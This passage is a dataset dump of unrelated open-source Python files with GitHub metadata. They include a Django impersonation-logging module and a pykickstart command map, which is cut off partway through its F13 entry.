| text (string, lengths 4 to 1.02M) | meta (dict) |
|---|---|
from __future__ import absolute_import
import os
from apollo import ApolloInstance
from .config import read_global_config, global_config_path
def get_instance(instance_name=None):
# I don't like reading the config twice.
conf = read_global_config()
if not os.path.exists(global_config_path()):
# Probably creating the file for the first time.
return None
if instance_name is None or instance_name == '__default':
try:
instance_name = conf['__default']
except KeyError:
raise Exception("Unknown Apollo instance and no __default provided")
if instance_name not in conf:
raise Exception("Unknown Apollo instance; check spelling or add to ~/.apollo-arrow.yml")
return conf[instance_name]
def get_apollo_instance(instance_name=None):
conf = get_instance(instance_name=instance_name)
return ApolloInstance(conf['url'], conf['username'], conf['password'])
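# A minimal usage sketch (hypothetical instance name; assumes a matching
# entry exists in ~/.apollo-arrow.yml):
#
#     ai = get_apollo_instance('my-apollo')
#     # ai is an ApolloInstance bound to that instance's URL and credentials.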
|
{
"content_hash": "6c844b8e8e063eab2efb9909f90d8874",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 96,
"avg_line_length": 34,
"alnum_prop": 0.6859243697478992,
"repo_name": "galaxy-genome-annotation/python-apollo",
"id": "7307afd86ce9e94f19f2dab057b30cf4198c3c54",
"size": "952",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "arrow/apollo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "131"
},
{
"name": "Python",
"bytes": "210325"
},
{
"name": "Shell",
"bytes": "2584"
}
],
"symlink_target": ""
}
|
'''
Created on Apr 28, 2010
@author: jnaous
'''
from django.contrib import admin
from models import UserProfile
admin.site.register(UserProfile)
|
{
"content_hash": "89998b308d0d27ccd203d5126557b7e0",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 32,
"avg_line_length": 16.333333333333332,
"alnum_prop": 0.7687074829931972,
"repo_name": "dana-i2cat/felix",
"id": "7546f7b99cbcdbc9c150af6e4f631beb00b9d40a",
"size": "147",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "expedient/src/python/expedient/clearinghouse/users/admin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "337811"
},
{
"name": "DTrace",
"bytes": "370"
},
{
"name": "Elixir",
"bytes": "17243"
},
{
"name": "Emacs Lisp",
"bytes": "1098"
},
{
"name": "Groff",
"bytes": "1735"
},
{
"name": "HTML",
"bytes": "660363"
},
{
"name": "Java",
"bytes": "18362"
},
{
"name": "JavaScript",
"bytes": "838960"
},
{
"name": "Makefile",
"bytes": "11211"
},
{
"name": "Perl",
"bytes": "5416"
},
{
"name": "Python",
"bytes": "7875883"
},
{
"name": "Shell",
"bytes": "258079"
}
],
"symlink_target": ""
}
|
from nose.tools import eq_
from kitsune.karma.templatetags.jinja_helpers import karma_titles
from kitsune.karma.models import Title
from kitsune.users.tests import TestCase, UserFactory, GroupFactory
class KarmaTitleHelperTests(TestCase):
def setUp(self):
super(KarmaTitleHelperTests, self).setUp()
self.user = UserFactory()
self.group = GroupFactory(name='group')
self.user.groups.add(self.group)
def test_user_title(self):
title = 'User Title'
t = Title(name=title)
t.save()
t.users.add(self.user)
titles = karma_titles(self.user)
eq_(1, len(titles))
eq_(title, titles[0].name)
def test_group_title(self):
title = 'Group Title'
t = Title(name=title)
t.save()
t.groups.add(self.group)
titles = karma_titles(self.user)
eq_(1, len(titles))
eq_(title, titles[0].name)
def test_user_and_group_title(self):
u_title = 'User Title'
g_title = 'Group Title'
t = Title(name=u_title)
t.save()
t.users.add(self.user)
t = Title(name=g_title)
t.save()
t.groups.add(self.group)
titles = [k.name for k in karma_titles(self.user)]
eq_(2, len(titles))
assert u_title in titles
assert g_title in titles
|
{
"content_hash": "4d38e5722e22a163d55f6889000c5810",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 67,
"avg_line_length": 29.933333333333334,
"alnum_prop": 0.5983667409057164,
"repo_name": "anushbmx/kitsune",
"id": "7d8897728957c655f2b8ae0de4c8c4727d07ba53",
"size": "1347",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "kitsune/karma/tests/test_templatetags.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "335184"
},
{
"name": "Dockerfile",
"bytes": "3547"
},
{
"name": "Groovy",
"bytes": "4221"
},
{
"name": "HTML",
"bytes": "628447"
},
{
"name": "JavaScript",
"bytes": "802494"
},
{
"name": "Makefile",
"bytes": "3600"
},
{
"name": "Python",
"bytes": "2994910"
},
{
"name": "Shell",
"bytes": "19325"
},
{
"name": "TSQL",
"bytes": "1035"
}
],
"symlink_target": ""
}
|
''' common module '''
__all__ = ['common']
from heron.tools.ui.src.python.handlers.common.consts import *
from heron.tools.ui.src.python.handlers.common.utils import *
|
{
"content_hash": "d13fe4ade4564a19be9f8fadbbd60212",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 62,
"avg_line_length": 33.8,
"alnum_prop": 0.7218934911242604,
"repo_name": "nlu90/heron",
"id": "4ace12b20556e6d08730c7161160cde9d81c2fca",
"size": "954",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "heron/tools/ui/src/python/handlers/common/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "14063"
},
{
"name": "C++",
"bytes": "1723598"
},
{
"name": "CSS",
"bytes": "77708"
},
{
"name": "HCL",
"bytes": "5314"
},
{
"name": "HTML",
"bytes": "39414"
},
{
"name": "Java",
"bytes": "4879240"
},
{
"name": "JavaScript",
"bytes": "1107160"
},
{
"name": "M4",
"bytes": "18741"
},
{
"name": "Makefile",
"bytes": "1046"
},
{
"name": "Objective-C",
"bytes": "2143"
},
{
"name": "Perl",
"bytes": "9298"
},
{
"name": "Python",
"bytes": "1693745"
},
{
"name": "Ruby",
"bytes": "1930"
},
{
"name": "Scala",
"bytes": "130046"
},
{
"name": "Shell",
"bytes": "197064"
},
{
"name": "Smarty",
"bytes": "528"
}
],
"symlink_target": ""
}
|
import logging
import hashlib
from django.conf import settings
from django.dispatch import Signal, receiver
from django.utils.timezone import now as tz_now
from django.utils.crypto import get_random_string
from .models import ImpersonationLog
logger = logging.getLogger(__name__)
# signal sent when an impersonation session begins
session_begin = Signal(
providing_args=['impersonator', 'impersonating', 'request']
)
# signal sent when an impersonation session ends
session_end = Signal(
providing_args=['impersonator', 'impersonating', 'request']
)
def gen_unique_id():
return hashlib.sha1(
u'{0}:{1}'.format(get_random_string(), tz_now()).encode('utf-8')
).hexdigest()
@receiver(session_begin, dispatch_uid='impersonate.signals.on_session_begin')
def on_session_begin(sender, **kwargs):
''' Create a new ImpersonationLog object.
'''
impersonator = kwargs.get('impersonator')
impersonating = kwargs.get('impersonating')
logger.info(u'{0} has started impersonating {1}.'.format(
impersonator,
impersonating,
))
if getattr(settings, 'IMPERSONATE_DISABLE_LOGGING', False):
return
request = kwargs.get('request')
session_key = gen_unique_id()
ImpersonationLog.objects.create(
impersonator=impersonator,
impersonating=impersonating,
session_key=session_key,
session_started_at=tz_now()
)
request.session['_impersonate_session_id'] = session_key
request.session.modified = True
@receiver(session_end, dispatch_uid='impersonate.signals.on_session_end')
def on_session_end(sender, **kwargs):
''' Update ImpersonationLog with the end timestamp.
This uses the combination of session_key, impersonator and
user being impersonated to look up the corresponding
impersonation log object.
'''
impersonator = kwargs.get('impersonator')
impersonating = kwargs.get('impersonating')
logger.info(u'{0} has finished impersonating {1}.'.format(
impersonator,
impersonating,
))
if getattr(settings, 'IMPERSONATE_DISABLE_LOGGING', False):
return
request = kwargs.get('request')
session_key = request.session.get('_impersonate_session_id', None)
try:
# look for unfinished sessions that match impersonator / subject
log = ImpersonationLog.objects.get(
impersonator=impersonator,
impersonating=impersonating,
session_key=session_key,
session_ended_at__isnull=True,
)
log.session_ended_at = tz_now()
log.save()
except ImpersonationLog.DoesNotExist:
logger.warning(
(u'Unfinished ImpersonationLog could not be found for: '
u'{0}, {1}, {2}').format(
impersonator,
impersonating,
session_key,
)
)
except ImpersonationLog.MultipleObjectsReturned:
logger.warning(
(u'Multiple unfinished ImpersonationLog matching: '
u'{0}, {1}, {2}').format(
impersonator,
impersonating,
session_key,
)
)
    # pop() instead of del: the key may be absent (e.g. if logging was
    # disabled when the session began), and cleanup should not raise.
    request.session.pop('_impersonate_session_id', None)
request.session.modified = True
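# A minimal sending sketch (hypothetical caller; in practice the
# impersonate views send these signals):
#
#     session_begin.send(
#         sender=None,
#         impersonator=request.user,
#         impersonating=target_user,
#         request=request,
#     )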
|
{
"content_hash": "ca29c771c6dcc3699d752fffbeab04e2",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 77,
"avg_line_length": 30.60185185185185,
"alnum_prop": 0.6420574886535552,
"repo_name": "Top20Talent/django-impersonate",
"id": "cbed2f15f2dda3a21d05ec44d841040e82922cee",
"size": "3329",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "impersonate/signals.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "2614"
},
{
"name": "Python",
"bytes": "62782"
}
],
"symlink_target": ""
}
|
from pykickstart.version import *
from pykickstart.commands import *
# This map is keyed on kickstart syntax version as provided by
# pykickstart.version. Within each sub-dict is a mapping from command name
# to the class that handles it. This is an onto mapping - that is, multiple
# command names can map to the same class. However, the Handler will ensure
# that only one instance of each class ever exists.
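# For example, in the FC3 map below the names "halt", "poweroff", "reboot"
# and "shutdown" all map to reboot.FC3_Reboot, so those four commands share
# a single handler instance.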
commandMap = {
FC3: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC3_Bootloader,
"cdrom": method.FC3_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"driverdisk": driverdisk.FC3_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC3_Reboot,
"harddrive": method.FC3_Method,
"ignoredisk": ignoredisk.FC3_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC3_LangSupport,
"lilo": bootloader.FC3_Bootloader,
"lilocheck": lilocheck.FC3_LiloCheck,
"logvol": logvol.FC3_LogVol,
"monitor": monitor.FC3_Monitor,
"mouse": mouse.FC3_Mouse,
"network": network.FC3_Network,
"nfs": method.FC3_Method,
"part": partition.FC3_Partition,
"partition": partition.FC3_Partition,
"poweroff": reboot.FC3_Reboot,
"raid": raid.FC3_Raid,
"reboot": reboot.FC3_Reboot,
"rootpw": rootpw.FC3_RootPw,
"selinux": selinux.FC3_SELinux,
"shutdown": reboot.FC3_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC3_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC3_Method,
"vnc": vnc.FC3_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC3_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on fc3
FC4: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC4_Bootloader,
"cdrom": method.FC3_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC3_Reboot,
"harddrive": method.FC3_Method,
"ignoredisk": ignoredisk.FC3_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC3_LangSupport,
"logvol": logvol.FC4_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC3_Monitor,
"mouse": mouse.FC3_Mouse,
"network": network.FC4_Network,
"nfs": method.FC3_Method,
"part": partition.FC4_Partition,
"partition": partition.FC4_Partition,
"poweroff": reboot.FC3_Reboot,
"raid": raid.FC4_Raid,
"reboot": reboot.FC3_Reboot,
"rootpw": rootpw.FC3_RootPw,
"selinux": selinux.FC3_SELinux,
"shutdown": reboot.FC3_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC3_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC3_Method,
"vnc": vnc.FC3_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC3_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on fc4
FC5: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC4_Bootloader,
"cdrom": method.FC3_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC3_Reboot,
"harddrive": method.FC3_Method,
"ignoredisk": ignoredisk.FC3_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC5_LangSupport,
"logvol": logvol.FC4_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC3_Monitor,
"mouse": mouse.FC3_Mouse,
"network": network.FC4_Network,
"nfs": method.FC3_Method,
"part": partition.FC4_Partition,
"partition": partition.FC4_Partition,
"poweroff": reboot.FC3_Reboot,
"raid": raid.FC5_Raid,
"reboot": reboot.FC3_Reboot,
"rootpw": rootpw.FC3_RootPw,
"selinux": selinux.FC3_SELinux,
"shutdown": reboot.FC3_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC3_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC3_Method,
"vnc": vnc.FC3_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC3_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on fc5
FC6: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC4_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.FC3_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.FC6_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC5_LangSupport,
"logging": logging.FC6_Logging,
"logvol": logvol.FC4_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC6_Monitor,
"mouse": mouse.FC3_Mouse,
"multipath": multipath.FC6_MultiPath,
"network": network.FC6_Network,
"nfs": method.FC6_Method,
"part": partition.FC4_Partition,
"partition": partition.FC4_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.FC5_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.FC6_Repo,
"rootpw": rootpw.FC3_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"user": user.FC6_User,
"url": method.FC6_Method,
"vnc": vnc.FC6_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC6_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on fc6
F7: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC4_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.FC3_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.FC6_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.FC4_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC6_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.FC6_Network,
"nfs": method.FC6_Method,
"part": partition.FC4_Partition,
"partition": partition.FC4_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F7_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.FC6_Repo,
"rootpw": rootpw.FC3_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC6_Method,
"user": user.FC6_User,
"vnc": vnc.FC6_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC6_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on f7
F8: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F8_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.FC6_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.FC4_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC6_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F8_Network,
"nfs": method.FC6_Method,
"part": partition.FC4_Partition,
"partition": partition.FC4_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F7_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F8_Repo,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC6_Method,
"user": user.F8_User,
"vnc": vnc.FC6_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC6_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on f8
F9: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F9_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F8_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.F9_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.FC6_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F9_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC6_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.FC6_Method,
"part": partition.F9_Partition,
"partition": partition.F9_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F9_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F8_Repo,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC6_Method,
"user": user.F8_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F9_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on f9
F10: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F9_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F8_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.F10_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F9_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.FC6_Method,
"part": partition.F9_Partition,
"partition": partition.F9_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F9_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F8_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC6_Method,
"user": user.F8_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F10_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on f10
F11: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F9_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F8_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.F10_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F9_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.FC6_Method,
"part": partition.F11_Partition,
"partition": partition.F11_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F9_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F11_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.FC6_Method,
"user": user.F8_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F10_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on f11
F12: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F12_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F12_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F12_DriverDisk,
"fcoe": fcoe.F12_Fcoe,
"firewall": firewall.F10_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"group": group.F12_Group,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F12_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.FC6_Method,
"part": partition.F12_Partition,
"partition": partition.F12_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F12_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F11_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.FC6_Method,
"user": user.F12_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F10_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.F12_ZFCP,
},
# based on f12
F13: {
"auth": authconfig.FC3_Authconfig,
